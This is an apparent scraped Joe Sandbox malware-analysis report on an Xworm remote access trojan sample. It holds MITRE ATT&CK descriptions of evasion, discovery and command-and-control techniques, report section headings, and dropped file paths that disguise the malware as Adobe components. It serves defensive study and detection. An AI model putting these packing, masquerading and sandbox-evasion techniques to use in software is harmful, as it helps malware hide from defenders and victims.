Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report jcMcDQ11pZ.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Xworm

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\AdobeIPC

C:\ProgramData\AdobeIPC.exe

C:\ProgramData\Guna.UI2.dll

C:\ProgramData\Stellar Generator.config

C:\ProgramData\Stellar Generator.exe

C:\ProgramData\Stellar Generator.pdb

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AdobeIPC.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AdobeIPC.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\jcMcDQ11pZ.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\Log.tmp

Windows Analysis Report
jcMcDQ11pZ.exe

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre